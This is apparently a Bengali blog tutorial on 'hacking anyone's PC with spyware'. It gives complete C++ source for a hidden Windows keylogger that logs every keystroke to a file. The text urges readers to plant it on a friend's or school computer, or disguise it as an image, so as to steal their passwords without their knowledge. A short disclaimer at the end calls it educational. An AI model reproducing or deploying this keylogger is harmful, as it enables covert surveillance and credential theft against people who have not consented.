হ্যাক করুন যে কারো পিসি স্পাইওয়ার দিয়ে

স্বাগতম বন্ধুরা আজকে আমি আপনাদের সাথে আলোচন করবো স্পাইওয়ার নিয়ে।
হ্যাকিং এর সবচেয়ে ইন্টারেস্টিং বিষয় হলো Spying আজকে আমি আলোচনা করবো একটি C++ স্পাইওয়ার কোড নিয়ে।
এই স্পাইওয়ার টি আপনি আপনার বন্ধুর বা স্কুলের পিসি তে ইন্সটল করে হাতিয়ে নিতে পারেন তার সব পাসোওয়ার্ড icon smile হ্যাক করুন যে কারো পিসি স্পাইওয়্যার দিয়ে।
এটা খুবই সাধারন হ্যাকিং অনেকটা পিশিং এর মতন।

পিশিং ব্যাবহারের অসুবিধাঃ
আপনার পিশিং পেইজ হোস্টিং এ আপ্লোড কর‍তে হয়। তার মধ্যে বেশির ভাগ হোস্টিং পিশিং পেইজ ডিটেক্ট করতে পারে, ডিটেক্ট করার পর পিশিং ডিলেট করে দেয়। এবং পিশিং করার জন্যে আপনি যেই লিঙ্ক টা দিবেন সেই লিঙ্কটা হবে ডিফারেন্ট তাই ভিক্টিম সহজেই বুঝে যাবে যে এটা একটা পিশিং পেইজ।

যেমনঃ আপনি যদি ফেইসবুকের কোনো পিশিং পেইজ বানান লিঙ্কটার এড্রেস যদি এরকম হয়ঃwww.1facebook.com তাহলে ভিক্টিম যদি এড্রেস টার দিকে ভালো ভাবে লক্ষ করে সে সহজেই বুঝে যাবে এটা একটি পিশিং পেইজ icon smile হ্যাক করুন যে কারো পিসি স্পাইওয়্যার দিয়ে।
স্পাইওয়্যার রে সুফলঃ
খুব সহজেই তৈরী করা যায় এবং ভিক্টিম বুঝতেও পারবে না যে সে হ্যাকিং এর শিকার হচ্ছে ।
কিভাবে Visual C++ ব্যাবহার করে কি লগার বানাবেন
যা যা দরকার হবেঃ
Dev C++ এখান থেকে ডাউনলোড করুনঃ http://www.bloodshed.net/
আর আপনার জানতে হবে C++ (যদি আপনি নিজে কোড বানাতে চান)
ডাউনলোড হবার পর C++ ইন্সটল করুন এবং ওপেন করুন C++ complier
তারপর যান–>New–>Source File.
আপনি একটি খালি ওয়ার্ক স্পেস দেখতে পাবেন উইন্ডো তে
এখান নিচের কোড গুলি কপি করে দিন ওই জায়গায়ঃ

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,”LOG.txt”);
}
}
system (“PAUSE”);
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]“);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%s”, “n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%s”, ” “);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%s”, “[TAB]“);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%s”, “[SHIFT]“);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%s”, “[CONTROL]“);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]“);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%s”, “[END]“);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%s”, “[HOME]“);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%s”, “[LEFT]“);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%s”, “[UP]“);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%s”, “[RIGHT]“);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%s”, “[DOWN]“);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%s”, “.”);
else
fprintf(OUTPUT_FILE, “%s”, &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}

আবার কোড গুলো কম্পাইল করুনঃ প্রেস (ctrl+f9)
আবার প্রোগ্রামটি এক্সকিউট করুনঃপ্রেস(ctrl+f10)
এখন আপনার পিসি তে কি লগার টি চালু হয়ে যাবে। আপনি এখন যায় লেখবেন তা log.txt ফাইলটা তে ষ্টোর হবে।
আবার এই ফাইলটি কোনো ইমেজ অথবা অন্য কোনো মাধ্যমে আপনার বন্ধুর কাছে পাঠিয়ে দিন
অথবা
আপনার যদি তার কম্পিউটারে Physical Access থাকে তাহলে তো আর কথায় নেই প্রোগ্রাম টি তার কম্পিউটারে সেটাপ করে দিয়ে আসুন।
আবার দেখবেন আসল মজা icon biggrin হ্যাক করুন যে কারো পিসি স্পাইওয়্যার দিয়ে।
সে যা কিছু টাইপ করবে সব আপনার log.txt ফাইলটা তে সেইভ হবে।
বিদ্রঃনিজ দায়িত্তে ব্যাবহার করবেন,কারো কোনো ক্ষতির জন্য আমি দায়ী থাকবো নাহ।আর এই টিউটোরিয়াল শুধুমাত্র শেখার জন্য লেখা
আর ভূল ব্যাবহার না করার অনুরোধ রইলো।
শুধুমাত্র লেখাটাকে আকর্ষণীয় করার জন্যে এখানে বন্ধুর কথা উল্লেখ করা হয়েছে । ধন্যবাদ।